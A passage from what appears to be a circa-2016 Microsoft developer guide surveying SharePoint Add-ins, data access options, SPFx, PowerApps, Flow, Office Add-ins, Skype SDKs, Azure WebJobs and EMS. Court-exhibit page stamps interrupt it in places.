- Add-ins don't have custom code that runs on the SharePoint servers. Instead, all custom logic moves "up" to the cloud, or "down" to client computers, or "over" to an on-premises server that is outside the SharePoint Online subscription.
- Almost all major types of SharePoint components can be part of a SharePoint Add-in, including pages, lists, workflows, custom content types, list templates, Web Parts, and more.
- SharePoint Add-ins can fit into a SharePoint website in several ways: As an **immersive full-page** experience that can have the look and feel of a SharePoint page, as **part of a webpage**, using a special kind of control, called an add-in part, to surface an iframe element that contains the add-in OR, as **UI commands** that extend ribbons and menus by adding the add-in to list items, documents, and more.
- All SharePoint Add-ins that users install get a tile on the Site Contents page of the SharePoint website. Clicking the tile runs the add-in.
- A SharePoint Add-in is configured using an add-in manifest—an XML file that declares the add-in's basic properties, where it runs, and what SharePoint should do when the add-in starts.

## Using data in SharePoint Add-ins

In your add-in, you will frequently have to retrieve and manipulate SharePoint data, such as items in document libraries and lists, metadata, or user profiles. Similarly, you might have scenarios where you need to access external data in add-in. The model for SharePoint Add-ins provides multiple connectivity options and a rich set of APIs for accessing the data and services that reside on SharePoint and on external systems.

As you design add-in and plan for data access, you have to make two key decisions:

- Which connectivity option should I use?
- What APIs should I use for accessing the data I need?

The following figures summarize the different options that are provided by the model for SharePoint Add-ins.

**Options for using SharePoint data in your add-in**



You have to decide whether you want to authenticate and communicate to SharePoint by using (1) OAuth, or (2) the cross-domain library. Then, for the data access API, you must decide between (3) the client object model (JavaScript/.NET client object models), or (4) Representational State Transfer (REST).

Keep in mind that you can also access certain data using (5) remote event receivers, however, the main scenario for remote event receivers is remote code execution.

**Options for using external data in your add-in**



You have to decide whether you want to use (1) the web proxy, (2) external content types, or (3) the cross-domain library with a custom proxy page to authenticate and communicate with external services or systems. You can also use (4) the client object model (JavaScript/.NET client object models), or (5) Representational State Transfer (REST).

## Data connectivity options

The following connectivity options are available when accessing SharePoint and External data from add-ins.

**SharePoint data connectivity options**:

- **OAuth**: An open protocol that enables secure authorization in a simple and standard way. OAuth enables users to approve an application to act on their behalf without sharing their user name and password. You can use OAuth with server-side code. It is a good option if you need to run a non-interactive process, or if you need to elevate privileges to other than those of the logged-on user.
- **Cross-domain library**: A client-side alternative in the form of a JavaScript file (SP.RequestExecutor.js) hosted in the SharePoint website that you can reference in your remote add-in. This library allows you to interact with more than one domain in your remote add-in page through a proxy. This is a good option if you prefer your add-in code to run in the client rather than in the server, or if there are connectivity barriers, such as firewalls, between SharePoint and your remote infrastructure.
- **Remote event receivers**: You can use remote event receivers to handle events that occur to an item in the add-in, such as a list, a list item, or a web. These events resemble those in a traditional SharePoint solution, except that they can work with the remote components of the SharePoint Add-in.

**External data connectivity options**:

- **Web proxy**: As a developer, you can use the web proxy exposed in client APIs such as the JSOM. When you use the web proxy, you issue the initial request to SharePoint. In turn, SharePoint requests the data to the specified endpoint and forwards the response back to your page. Use the web proxy when you want the communication to occur at the server level. The web proxy is designed to access unstructured data that doesn't require authentication.
- **External content types**: You can create add-ins that access external data from SAP, Netflix, and proprietary and other types of data without involving the tenant administrator. Access to external applications is maintained through Business Connectivity Services (BCS), which provides a consistent and uniform interface that can be used by other SharePoint applications. App-scoped ECTs are a good option when you are using a BCS model and access to the data requires authentication.
- **Custom proxy page for the cross-domain library**: You can use the cross-domain library to access data in your remote add-in if you provide a custom proxy page that is hosted in the remote add-in infrastructure. As the developer, you are responsible for the custom proxy page implementation and must provide custom logic, such as the authentication mechanism to the remote add-in. Use the cross-domain library with a custom proxy page if you want the communication to occur at the client level.

## Available data access APIs

The following API choices are available when you want to access SharePoint data from add-in:

- **Representational State Transfer (REST)**: For scenarios in which you need to access SharePoint entities from client technologies that do not use JavaScript and are not built on the .NET Framework platform, SharePoint provides an

implementation of a REST web service that uses the Open Data (OData) protocol to perform CRUDQ (Create, Read, Update, Delete, and Query) operations on SharePoint data.

- **.NET Framework client object model (.NET client OM):** Almost every class in the core site and list server-side object model has a corresponding class in the .NET Framework client object model. In addition, the .NET Framework client object model also exposes a full set of APIs for extending other features, including some SharePoint-level features such as ECM, taxonomy, user profiles, advanced search, analytics, BCS, and others.

- **JavaScript client object model (JSOM):** SharePoint provides a JavaScript object model for use in either inline script or separate .js files. It includes all the same functionality as the .NET Framework client object model. The JSOM is a useful way of including custom SharePoint code in an add-in, especially in a SharePoint-hosted add-in, where custom server-side code is not allowed.

For the latest CSOM, refer to: New SharePoint CSOM version released for SharePoint Online - December 2016 blog post. We are also looking to update the SharePoint Online Management Shell on early January to align with this specific version. Keep track of the Office Dev Blog for updates in this area.

## Resources

**Microsoft Virtual Academy Courses** ...

- Getting Started with SharePoint Add-Ins
- Advanced SharePoint Add-in Development

**Read** ...

- SharePoint Add-ins
- Get started creating SharePoint-hosted SharePoint Add-ins
- Get started creating provider-hosted SharePoint Add-ins
- Secure data access and client object models for SharePoint Add-ins
- Choose patterns for developing and hosting your SharePoint Add-in
- New SharePoint CSOM version released for SharePoint Online - December 2016
- How to install add-in/app to SharePoint sites using CSOM
- SharePoint Online Management Shell

## Office 365 Public CDN Developer *Preview*

Office 365 Public Content Delivery Network (CDN) capability in the Office 365 will enable you to **automatically host static assets**, like images and JavaScript files in CDN for **providing better performance** with SharePoint pages. CDN will work effectively as a geo-distributed caching proxy, by caching the static assets closer to the browsers requesting them.

Office 365 Public CDN is now released as a *Developer Preview* for all tenants in Office 365. You can start using it by explicitly enabling the capability on the tenant level using PowerShell cmdlets.

Following picture clarifies the logical flow of using Office 365 Public CDN:



1. Administrator enables Office 365 Public CDN for the tenant using SharePoint Online Management Shell.
   - Cmdlets allow to designate certain SharePoint document libraries or folders to serve as a CDN origin. Note, that assets exposed via Public CDN are accessible by everyone anonymously. Therefore, resources that are considered sensitive by the company should never be placed in those libraries.
   - Cmdlets also provide capability to choose the file types exposed via CDN. By default, common design asset types are enabled.
2. Static assets to be shared via CDN are being uploaded to the SharePoint libraries or folders, which are enabled as the CDN origins.
3. Assets are being exposed from the configured libraries of folders and they can be accessed using the CDN URLs.
4. URLs pointing to CDN location are available to be used in the SharePoint sites and in the customizations hosted from SharePoint.

In case the asset is updated in the SharePoint library, the new version will become available via CDN within 15 minutes.

During developer preview of this capability, you'll need to explicitly update the used asset links and replace them with CDN URLs. The CDN URL can be easily constructed for all the assets in the enabled library of folder, you will need to use the REST API for getting prefix for one of the assets in library/folder and use that as the constant for other assets.

Refer to the Office 365 Public CDN Developer Preview Release blog post and the Office 365 Public CDN - Developer Preview video for more information.

## The Modern experiences

SharePoint Online has started the gradual introduction of "modern" experiences cross the SharePoint service, which has a direct impact on the end user experience but also on the customization options that can be used.

> The SharePoint "modern" experiences are currently not available for SharePoint on-premises. They are planned to, step by step, become available for SharePoint 2016 as part of upcoming feature packs.

The modern experiences in SharePoint Online are:

- **Modern team sites**
- **Modern list and library experiences**
- **Modern site pages**

"Modern" experiences are gradually released in SharePoint Online and you can control how they are taken into use from tenant or site level. If you have a lot of existing important customizations, you can defer taking new experiences into use until needed customizations scenarios can be enabled with them as well.

We recommend using the following process for adopting to the "modern" experiences, if you have existing customizations which are business critical for your deployment:

1. **Readiness**: Understand the "modern" experiences, know what features they offer but equally important understand what's features are not (yet) available
2. **Assess**: Assess to what extend your current customizations can work in the "modern" experience. Also assess which of your sites do have customizations or features that will not work in the "modern" experiences, these sites and their customizations should be updated or need to stay in "classic". However all other sites should work fine using the "modern" experiences.
3. **Solution planning**: Plan the needed work on both custom solutions as sites to prepare them to be used with the "modern" experiences
4. **Develop and test**: Apply the needed changes to your customizations and test them
5. **Deploy**: Roll out the updated changes to your SharePoint Online environment

Here are the key scenarios currently supported by the "modern" experiences.

| Customization | Introduction to options |
|---|---|
| Provisioning "modern" team sites | "Modern" team sites can be provisioned by an end user but you can also create these sites programmatically which is explained in detail in Provisioning modern team sites article. |
| Customizing "modern" team sites | "Modern" team sites are sites which bring a fresh new responsive user experience to SharePoint Online, showing relevant information on the home page. Typically these sites also have a corresponding Office 365 Group associated. Learn more about the customization options in Customizing modern team sites article. |
| Customizing "modern" lists and libraries | "Modern" lists and document libraries bring a better user experience which is faster, more intuitive and responsive. The Customizing modern lists and libraries article focuses on the extensibility options, such as user custom actions and branding, which are supported for the "modern" library and list experiences. |

| Customization | Introduction to options |
|---|---|
| Customizing "modern" site pages | "Modern" team site pages are fast, easy to author and support rich multimedia content. And pages look great on any device, in a browser or from within the SharePoint mobile app. The Customizing modern site pages article focuses on the extensibility options there are in the "modern" page experience. |

Online resources to refer to are:

- Customizing the "modern" experiences in SharePoint Online
- Provisioning "modern" team sites programmatically
- Customizing "modern" team sites
- Customizing "modern" lists and libraries
- Customizing "modern" site pages

## SharePoint Webhooks

SharePoint webhooks enable developers to build applications that subscribe to receive notifications on specific events that occur in SharePoint. When an event is triggered, SharePoint sends an HTTP POST payload to the subscriber. Webhooks are easier to develop and consume than Windows Communication Foundation (WCF) services used by SharePoint add-in remote event receivers. This is because webhooks are regular HTTP services (web API).

Currently webhooks are only enabled for SharePoint list items. SharePoint list item webhooks cover the events corresponding to list item changes for a given SharePoint list or a document library. SharePoint webhooks provide a simple notification pipeline so your application can be aware of changes to a SharePoint list without polling the service.

For more information see SharePoint list webhooks and SharePoint webhooks sample reference implementation.

## SharePoint Framework (*Preview*)

The SharePoint Framework is the next evolution in SharePoint development.

> *The SharePoint Framework is currently in preview and is subject to change. SharePoint Framework client-side web parts are not currently supported for use in production environments.*

The **SharePoint Framework (SPFx)** is a page and web part model that provides full support for client-side SharePoint development, easy integration with SharePoint data, and support for open source tooling. With the SharePoint Framework, you can use modern web technologies and tools in your preferred development environment to build productive

experiences and apps that are responsive and mobile-ready from day one. The SharePoint Framework works for SharePoint on-premises and SharePoint Online.

Key features of the SharePoint Framework include:

- Runs in the context of the current user and connection in the browser. There are no iFrames.
- The controls are rendered in the normal page DOM.
- The controls are responsive and accessible by nature.
- Enables the developer to access the lifecycle - including, in addition to **render** - **load**, **serialize** and **deserialize**, **configuration changes**, and more.
- It's framework agnostic. You can use any browser framework that you like: React, Handlebars, Knockout, Angular, and more.
- The toolchain is based on common open source client development tools like npm, TypeScript, Yeoman, webpack, and gulp.
- Performance is reliable.
- End users can use SPFx client-side solutions that are approved by the tenant administrators (or their delegates) on all sites, including self-service team, group, or personal sites.
- Solutions can be deployed in both classic web part and publishing pages and modern pages.

## Resources

- [SharePoint Framework documentation](#)
- [React - A JavaScript Library for Building User Interfaces](#)
- [Sample SharePoint Framework web parts in GitHub](#)
- [Open and Connected Framework - The SharePoint Framework](#) - YouTube
- [PnP Webcast - Building multi-view React client-side web parts with SharePoint Framework](#)
- [PnP Webcast - Building real time news feed web part with SharePoint Framework](#)
- [PnP Webcast - Building multi-view Angular 1.x client-side web parts with SharePoint Framework](#)
- [PnP Webcast - Reuse your existing JavaScript libraries with SharePoint Framework](#)
- [PnP Webcast - Building a sample search web part with SharePoint Framework using React](#)
- [PnP Webcast - Azure AD implicit flow with SPFx client-side web part (developer preview)](#)
- [PnP Webcast - CRUD operations with SharePoint Framework client-side web parts](#)
- [PnP Webcast - Using Office Graph from SharePoint client-side web parts](#)
- [PnP Webcast - Referencing external JavaScript libraries from client-side web part](#)
- [PnP Webcast - Building Angular SharePoint Framework client-side web part](#)
- [PnP Webcast - Building simple SharePoint Framework Client Web Part](#)
- [PnP Webcast - Integrating Angular v1.x to SharePoint Framework client side web part](#)
- [PnP Webcast - Getting started with web stack in SharePoint Development](#)
- [PnP Webcast - Getting started with SharePoint Framework](#)

- [PnP Webcast - Preparing for SharePoint Framework - What should I learn?](#)
- [PnP Webcast - Converting existing JavaScript apps to SharePoint Framework](#)
- [PnP JavaScript Core component](#)

## Office UI Fabric

Office UI Fabric is a responsive, mobile-first, front-end framework that you can use to apply the Office Design Language to your web experiences. Whether you're creating a new app or add-in or updating an existing one, Fabric makes it easy to get up and running.

- Built by Microsoft designers and design developers for Microsoft (and you).
- Just like other popular frameworks, but built from the ground up for Office 365 without excessive overriding.
- All about styling instead of JavaScript, so you can focus on your look and feel.
- Integrates with other frameworks, like Bootstrap. Built with **LESS** for powerful customization.
- Language support (including right-to-left behavior) to simplify localization.

The Office UI Fabric project is developed and maintained by the OneDrive and SharePoint Design Studio in order to...

- Help the development community build Office Add-ins and Office 365 web apps that integrate seamlessly with Office.
- Provide a point of reference for the evolving Office 365 design language that anyone can reference.
- Enable the community to contribute to better experiences for everyone who builds for Office.

## Resources

- [What is Office UI Fabric?](#)
- [GitHub: Office UI Fabric](#)
- [Office UI Fabric: Resources](#)
- [Fabric tutorial](#)

## OneDrive API

OneDrive API is available for OneDrive, OneDrive for Business and SharePoint Online. OneDrive API is also integrated into Microsoft Graph API, which enables even more scenarios around personal and business files.

**Note:** Although OneDrive stores OneNote notebooks, you shouldn't use the OneDrive API to work with OneNote notebooks. Instead, use the [OneNote API](#).

## Resources

- [Develop with the OneDrive API](#)

- [OneDrive for Business authentication and sign in](#)
- [Access to shared items and items "added to OneDrive"](#)
- [Working with OneDrive API and CORS](#)
- [OneDrive unified JavaScript Picker and Saver SDK (preview)](#)
- SDKs for [iOS](#), [Android](#), [Windows / .NET / Xamarin](#) and [Python](#) are now generally available

# Office 365 Connectors

Office 365 Connectors are a great way to get useful information and content into your Office 365 Group. Any user can connect their group to services like Trello, Bing News, Twitter, etc., and get notified of the group's activity in that service.

Office 365 Connectors also provides a compelling extensibility solution for developers. Developers can build connectors through **incoming webhooks** to generate rich connector cards. Additionally, with the new "**Connect to Office 365**" button, developers can embed the button on their site and enable users to connect to Office 365 groups.

## Office 365 Connector Cards

Connectors use webhooks to create Connector Card messages within an Office 365 group. Developers can create these cards by sending an HTTP request with a simple JSON payload to an Office 365 group webhook address. A user can generate a group webhook from the "Incoming Webhooks" page in the Connectors menu.

Connector cards can be short text-based messages, or a developer can use "sections" to display rich or specially-formatted information. When more content is added to the payload, the card scales gracefully.



A section is a canvas to show richer content than what can be represented in the just the title and text of the card. A section can contain text and images, or the activity and facts fields can be used to highlight key events and details.



## 'Connect to Office 365' button

'Connect to Office 365' is an easy way for developers to integrate their product with Office 365 Groups. The Connect button lets you empower and engage your customers by sending connector cards to their Office 365 Groups.

Once you add a Connect button to your application, your users are able to use it to authorize their Office 365 Groups to receive your connector cards. The Connect button helps your app obtain a webhook to the Group authorized by your users. You can send rich connector cards to the Group using the webhook URL to share important updates, send reminders for pending actions, send weekly reports and so on.



## Resources

- [Get started with Office 365 Connector Cards](#)
- [Introducing 'Connect to Office 365' Beta](#)

# Business Application Platform

Compose analytics, user experiences, and automation using an integrated set of services from Microsoft. Build and extend modern business applications fast.

- **Power users** who understand their business challenges the best can now quickly build and deliver solutions without writing code.
- **Professional developers** can now easily extend capabilities for power users and take advantage of rich platform services with the full power of Azure.
- **The Microsoft Common Data Model** offers a rich framework that comes with hundreds of established entities and can be used across apps.
- **Connectors and Gateways** make it possible to get more value out of the services you're already using.

Case 0:20-cv-60416-XXXX   Document 3-14   Entered on FLSD Docket 02/26/2020   Page 276 of
726
Case 0:20-cv-60416-XXXX   Document 3-14   Entered on FLSD Docket 02/26/2020   Page 105 of
115



## Power up your power users

Now business analysts and power users can create apps without writing code. The people who understand their challenges best can compose data analytics, interfaces, and automation into flexible solutions.

**Add insights to your apps**

Monitor your business and get answers quickly with apps that have stunning visualizations and analytics built in.

Get started with Power BI

**Build experiences you can act on**

Create rich user experiences across the web, phones and tablets. Assemble forms, add business logic, and take advantage of device capabilities with full creative freedom.

Get started with PowerApps

**Automate your workflows**

Work smarter by building solutions that automate processes across apps and services. Streamline notifications, sync data between systems, automate approval workflows and more.

Get started with Microsoft Flow

## Seamlessly grow up with Azure

Power BI, PowerApps and Microsoft Flow are all backed by best-in-class cloud services for enterprise developers and IT professionals. Quickly extend capabilities for power users and scale to enterprise-wide manageability easily at any time.

**Unlock insight**

Deliver valuable insight that moves your business forward with comprehensive business intelligence, analytics and machine learning services that can be embedded into any app.

- SQL Server Business Intelligence
- Data analytics
- Internet of Things (IoT)

**Build intelligent interfaces**

Leverage powerful cloud platform services to quickly create components for power users. Take advantage of the same services to deliver standalone web and mobile apps rapidly.

- App Services
- Service Fabric
- Azure Functions

**Evolve your integration**

Bring together disparate applications to deliver solutions such as payment processing, supply chain management, and more that integrate seamlessly with the rest of your apps.

- Logic Apps
- API Management
- BizTalk

## Keep it all connected

Build business apps using a robust data framework with hundreds of established entities built in. Connect the services you're already using – even custom APIs and on-premises systems.

**Build on the Common Data Model**

The Microsoft Common Data Model comes with hundreds of entities established over years of working with enterprise customers. Use the same data with any of the platform tools, add custom entities, and rest easy with built-in scalability and analytics.

**Get more from the systems you're already using**

Bring together all the data your business already relies on without migrating a thing. Build apps using a rich set of connectors to popular applications, including on-premises sources. Integrate your own APIs easily.

## Microsoft PowerApps

**Microsoft PowerApps** is a business application platform that enables power users in line of business roles to easily build and deploy business apps. At the same time, **PowerApps** empowers IT organizations to catalyze business innovation by allowing business units to create apps, while maintaining control over data access and security.

The **Common Data Service**, included in **PowerApps**, is an out-of-the-box secure business database to improve operational efficiency offering a unified view of business data. **Common Data Service** provides App creators the flexibility to use standard business entities or custom entities to power their business apps.

To generate an app automatically, you just need to specify a data source. For step-by-step instructions, see Create an app to manage data in SharePoint. Even though the topic is designed for SharePoint, the same principles apply to other types of data sources.

## Customize an App

If the generated app doesn't meet your needs by default, you can customize it. You might, for example, want to show data in a different kind of UI element (known as a control).

For ideas about how to improve your app further, you can open a sample app to get a sense of what you can invent with your own creativity and a bit of experience.

You can also build an app from a template. Each template is based on fictitious data in a cloud account, such as Dropbox, OneDrive, or Google Drive. Explore specific screens and controls to understand how they're configured, and experiment with customization to discover techniques that you can apply to your own apps.

## Create an app from scratch

You can create an app from scratch. By working from the ground up, you gain flexibility in app design, flow, and controls, and you can incorporate a larger variety of data sources.

For detailed explanations of some concepts you'll need, see these topics:

- formulas
- galleries and forms
- tables and records
- controls and their properties

## Features and Pricing

PowerApps is licensed on a per-user basis. Each user who accesses the service to create and run apps needs a license. Office 365 and Dynamics 365 customers can immediately benefit from the PowerApps and Microsoft Flow capabilities that these offerings include. Customers who want to build apps and flows that access data sources outside Office 365 and Dynamics 365, or need additional functionality, can purchase standalone subscriptions to PowerApps and Microsoft Flow. There are important differences in functionality between these groups of licenses.

| For Office 365 and Dynamics 365 | For business users | For app makers and admins |
|---|---|---|
| PowerApps for Office 365 and Dynamics 365 | PowerApps Plan 1 | PowerApps Plan 2 |
| • Create and run custom business apps | • Everything included with PowerApps for | • Everything included with Plan 1 |

| For Office 365 and Dynamics 365 | For business users | For app makers and admins |
|---|---|---|
| • Extend the capabilities of Office 365 and Dynamics 365<br>• Automate your workflows with Microsoft Flow | Office 365 and Dynamics 365<br>• Use apps that connect to an even wider range of data sources, with premium connectors<br>• Use apps built on the Common Data Service | •Model your data using the Common Data Service<br>•Create and manage instances of the Common Data Service<br>•Enterprise-grade administration of environments and user policies |

## PowerApps for Office 365 and Dynamics 365

PowerApps capabilities for Office 365 and Dynamics 365 enable users to create and run apps within the context of these services. **PowerApps licenses always include Microsoft Flow capabilities**. In addition to being included in PowerApps licenses, Microsoft Flow is also available as a standalone service.

PowerApps will be added to existing and new Office 365 subscriptions starting later in November 2016.

These Office 365 plans include PowerApps for Office 365:

- Office 365 Business Essentials
- Office 365 Business Premium
- Office 365 Enterprise E1
- Office 365 Enterprise E3
- Office 365 Enterprise E5

## Resources

- Introduction to PowerApps
- PowerApps Blog
- Choose the right plans for your team
- Licensing Overview
- Manage your connections
- Add a data connection in an app
- Microsoft Common Data Model preview available for PowerApps

**Useful Ignite sessions …**

- Review business application platform roadmap, strategy and packaging
- Dive into PowerApps, building apps that mean business without writing code

## Microsoft Flow

Microsoft Flow is a *preview*, cloud-based, business-automation service with which you can build simple processes that make your business move more quickly and efficiently with less effort.

You can connect to a broad range of services through easy-to-use templates and create your own processes that are tailored to your goals.

**Templates** are pre-built flows for popular and common scenarios. Using a template only requires you to have access to the services in the template and to fill out any required settings.

**Data sources**: Built-in data connectors to more than 50 services, including Office 365, Twitter, OneDrive, Dropbox, Google Drive, Slack, MailChimp, Facebook, Dynamics CRM, SharePoint, Salesforce, and SQL.

## Manage Connections

Connections in Microsoft Flow allow you to easily access your data while building flows. Flow includes commonly used connections, including SharePoint, SQL, Office 365, OneDrive for Business, Salesforce, Excel, Dropbox, Twitter, and more. Connections are shared with **Microsoft PowerApps**, so when you create a connection in PowerApps, it shows up in Microsoft Flow, and vice versa.

For example, you can use connections to:

- Update a list on a SharePoint site.
- Get Excel data from your OneDrive for Business or Dropbox account.
- Connect to Office 365 and send email.
- Create a Twitter connection to send a tweet.

You can create connections in Microsoft Flow in multiple scenarios, such as:

- Creating a flow from a template
- Creating a flow from blank or updating an existing flow
- Creating a connection in the Microsoft Flow portal

## Flow and Logic Apps

Microsoft Flow is a stand-alone SaaS Service that is designed for broad usage, including business users that want to automate day-to-day tasks.

Logic Apps is an Azure service available through the Azure Portal. It is targeted at IT Professionals that need to tackle more complex integration problems, it includes the great features available in Microsoft Flow, plus additional capability like integration with Azure Resource Manager and the Azure Portal, PowerShell and the Azure Command-Line Interface (Azure CLI), Visual Studio, more advanced connectors. Learn more about Logic apps.

## Flow creation now available from mobile phones

You can now easily create a flow from your phone (available both on our iOS and Android apps) by just a few simple clicks. Browse our rich template gallery, navigate through our services list, or select a various template category to drill into.

Also, if you're looking for a specific service or template, you can simply search the gallery by keyword, and get in no time a list of results focused to your needs.

Finally, after creating your flow, you can come back and edit or rename it directly from within the app, from the flow properties page.

View our app_video, and check out our documentation that covers app concepts, from getting started to more advanced capabilities.

## Features and Pricing

Premium plans give you more runs, more checks, and access to services like MailChimp, Salesforce and many more.

| Flow Free | Flow for Office 365 and Flow for Dynamics 365 |
|---|---|
| • 750 runs per month<br>• Unlimited flow creation<br>• 15-minute checks | • 2,000 runs per month<br>• Unlimited flow creation<br>• 5-minute checks<br>• 99.9% SLA |
| | |
| Flow Plan 1 | Flow Plan 2 |
| • 4,500 runs per month<br>• Unlimited flow creation<br>• 3-minute checks<br>• Premium Services<br>• 99.9% SLA | • 15,000 runs per month<br>• Unlimited flow creation<br>• 1-minute checks<br>• Premium Services<br>• Org policy settings<br>• 99.9% SLA |

For more detailed information, refer to the Pricing page.

## Resources

- Microsoft Flow Blog
- Flow in your organization Q&A
- Create a flow from a template in Microsoft Flow
- Create a flow in Microsoft Flow
- Manage connections in Microsoft Flow
- Manage an on-premises data gateway
- YouTube Playlist: Microsoft Flow

**Useful Ignite sessions** …

- Dive into the Microsoft Common Data Model
- Review business application platform roadmap, strategy and packaging
- Dive into Microsoft Flow, create automated workflows between your favorite apps and services

## Office Add-ins

Build an add-in that lives inside Outlook, Excel, Word, PowerPoint, or Project to extend what you can do from right in the documents, across devices and platforms — like pulling

content from the web, calling mapping services, locating news, translating text, and more.

## Office Add-ins platform overview

Office Add-in is a web application hosted in a web browser control or iframe running in the context of an Office host application that can interact with a user's documents or mail items. You can use Office Add-ins to extend and interact with:

- Documents or data - Word documents, Excel spreadsheets, PowerPoint presentations, Access browser-based databases, and Project schedules and views.
- Outlook mailbox items - Email messages, meeting requests, or appointments.

Add-ins can run in multiple environments, including Office desktop applications, Office Online in both desktop and mobile browsers, and a growing number of Office tablet and phone add-ins.

## Resources

**Microsoft Virtual Academy Courses ...**

- [Getting Started with Office Add-Ins](#)
- [Advanced Office Add-in Development with Excel, Word, and PowerPoint](#)

**Read** ...

- [Office Add-ins platform overview](#)
- [Plan to develop Office Add-ins](#)
- [Create Office Add-ins with Napa with an Office 365 Developer Site](#)
- [Create and debug Office Add-ins in Visual Studio](#)
- [Understanding the JavaScript API for Office](#)

## Skype Developer Platform

The Skype Developer Platform enables **native integration of real-time presence, secure messaging, calling, and conference capabilities** within your web and mobile applications. Harness the power of our platform to embed interactive, multi-channel communications that enable greater productivity and collaboration.



**Embedded Engagement**

Embed live conversations in your website and apps by using our [Web SDK](#) and [App SDK](#).



Harness the power of our platform to embed interactive, multi-channel communications that enable greater productivity and collaboration.

**Industry Solutions**

You can build more engaging industry solutions using the Skype [User API](#), [Web SDK](#) and [App SDK](#).



Check out our [industry solutions](#) in [healthcare](#), [financial services](#), [retail](#), and [customer service](#) and get inspired.

**Social Connection**

Get people sharing and talking about your business with the friendly [Skype Share](#) and [Contact Me buttons](#) for instant calls and chats.



## Skype Web SDK

The Skype Developer Platform for Web ("Skype Web SDK") is a set of JavaScript Web APIs and HTML controls that enable you to build web experiences that seamlessly integrate a wide variety of real-time collaboration models leveraging Skype for

Business services and the larger Skype network. It provides support for multiple core collaboration services like presence, chat, audio, and video, enabling web experiences across a broad spectrum of users, platforms, and devices.

## Unified Communications Web API 2.0

Microsoft Unified Communications Web API 2.0 is a REST API that exposes Skype for Business Online instant messaging (IM) and presence capabilities. UCWA 2.0 enables developers to make their enterprise applications and intranets more lively and connected to business contacts.

Key use cases enabled by this API include:

- Lighting up presence in business apps and intranets.
- Embedding IM experience in enterprise-specific Line of Business apps across platforms/browsers/devices (contextual communications), especially Windows 8, Apple iPad, and others.
- Enabling Web Chat - pro-active chat feature for e-commerce site, helpdesk, support, and other scenarios.

Although UCWA 2.0 is language-independent, developers can use any programming language from C/C++ to Java, and the API is fine-tuned for web developers who are familiar with ordinary web technologies such as HTTP, OAuth, JSON, and JavaScript.

## Resources

- Skype Developer Platform
- Skype Developer Platform – MSDN homepage
- Skype Web SDK
- Unified Communications Web API 2.0

# Azure WebJobs

**Azure WebJobs** provide an easy way to run scripts or programs as background processes on App Service Web Apps. You can upload and run an executable file such as as cmd, bat, exe (.NET), ps1, sh, php, py, js and jar. These programs run as WebJobs on a schedule (cron) or continuously.

The **WebJobs SDK** makes it easier to use Azure Storage. The WebJobs SDK has a binding and trigger system which works with Microsoft Azure Storage Blobs, Queues and Tables as well as Service Bus Queues.

Creating, deploying, and managing WebJobs is seamless with integrated tooling in Visual Studio.The WebJobs dashboard in the Azure portal provides powerful management capabilities that give you full control over the execution of WebJobs.

## Using Azure WebJobs for Office 365

### Performing repetitive, scheduled, background processes

In SharePoint Online, you cannot deploy farm solutions, which is how timer jobs were deployed on SharePoint on-premises. To implement similar timer job functionality in SharePoint Online, you need to run a console application as an Azure WebJob. The console application accesses SharePoint Online using the client-side object model (CSOM). Some examples:

- Site metadata collection – for example reports on current administrators, storage usage, etc.
- Replicate taxonomy structure changes from on-premises master metadata management system to Office 365

### Performing asynchronous operations

Azure WebJob can be triggered immediately whenever there is a new message added to queue, not as a scheduled task. You can hook in your WebJob to either Azure queue storage or Azure service bus queues.

Here's the key elements for providing us the asynchronous processing pattern.



1. User operates in the SharePoint and starts provider hosted app UI one way or another (full page, pop up, app part etc.)
2. Actual operations are performed in the provider hosted app side which is collecting needed parameters and other settings for the processing
3. Operation request is stored to Azure storage queue or Service bus for processing
4. Task is picked up automatically by continuously running WebJob with needed details and requested operation is applied

Some examples:

- Self service operations for the end users, like site collection provisioning for cloud or for on-premises with service bus usage
- Route entries or information from Office 365 to on-premises systems

## Resources

**Watch Videos**

- PnP Web Cast - Asynchronous operations with Office 365 using Azure WebJobs

- PnP Add-In Transformation Training module 5: Using Remote Event Receivers and Remote Timer Jobs

**Read**

- Introduction to Azure WebJobs
- Azure WebJobs documentation resources
- Use Microsoft Azure WebJobs with Office 365
- Using Azure storage queues and WebJobs for async actions in Office 365
- Asynchronous operations with Azure storage queues and WebJobs
- How to Synchronize Terms across multiple term stores
- Create remote timer jobs in SharePoint

## Office 365 Developer Patterns and Practices

The Office 365 Developer Patterns and Practices program provides samples and documentation to help you transition your development solutions from full-trust code to the app model. Start by reading Transforming your SharePoint customizations to add-in model - Resources.

You can use the code samples and guidance in the Office 365 Developer Patterns and Practices project to help you develop business solutions for your organization or your customers. The project includes code samples that show you how to use provider-hosted add-ins to address key scenarios, as well as other resources that illustrate best practices for add-in model development.

**Must Read**: The Office 365 development patterns and practices solution guidance on MSDN provides samples and documentation to help you to implement typical customizations

for Office 365 or for SharePoint Online based on your functional requirements.

The GitHub repo - Office 365 Development Training Content houses all of the training content for Office 365 Development training courses. Videos related to the guidance are available on the Office 365 Developer Patterns and Practices channel on Channel 9.

> **PnP weekly web casts** are quick videos recorded around key topics for the Office 365 and SharePoint add-in model development. These are around 30-45 min long recordings on different resources, guidance and other patterns and practices. All web casts will be published to PnP YouTube channel.
>
> **Office 365 Dev PnP releases** are done typically first Friday of each month. Details on monthly releases are covered in the monthly community calls. Download calendar invite (ics) to save the call details to your calendar.

## Resources

- Transforming your SharePoint customizations to add-in model - Resources
- PnP under dev.office.com. One location for all the latest resources and announcements
- PnP GitHub. Main repository
- PnP MSDN pages
- PnP Yammer group
- PnP Videos at Channel 9
- PnP training package
- PnP Guidance Repository

# ENTERPRISE MOBILITY + SECURITY (EMS)



**Microsoft Enterprise Mobility + Security (EMS)** is the only comprehensive solution designed to help manage and protect users, devices, apps, and data in a mobile-first, cloud-first world. EMS enables Digital transformation with freedom and peace of mind.

## Solutions

### Identity and access management


**Control identity + access in the cloud**
Centrally manage single sign-on across devices, your datacenter, and the cloud

Azure AD is more than a "domain controller running on a cloud-hosted server," and more than a directory in the cloud. It is an **Identity and Access Management Solution as a Service**.



Azure AD offers several capabilities that can allow customers to expand their identity footprint from on-premises into the cloud:

- Synchronizing with AD DS
- Federating with AD DS
- Cloud-Only Authentication
- Pre-integrated SaaS apps for SSO and allowing corporate credentials to "just work"
- Custom line-of-business (LOB) app support and developer features
- User self-service capabilities like password reset and group management

By using Azure AD, your organization will be well positioned to adopt cloud-first or Hybrid Identity scenarios.

Refer to: Identity and access management

## Benefits

- Create and manage a single identity for each user across your hybrid enterprise, keeping users, groups and devices in sync
- Provide single sign-on access to your applications including thousands of pre-integrated SaaS apps
- Enable application access security by enforcing rules-based Multi-Factor Authentication for both on-premises and cloud applications
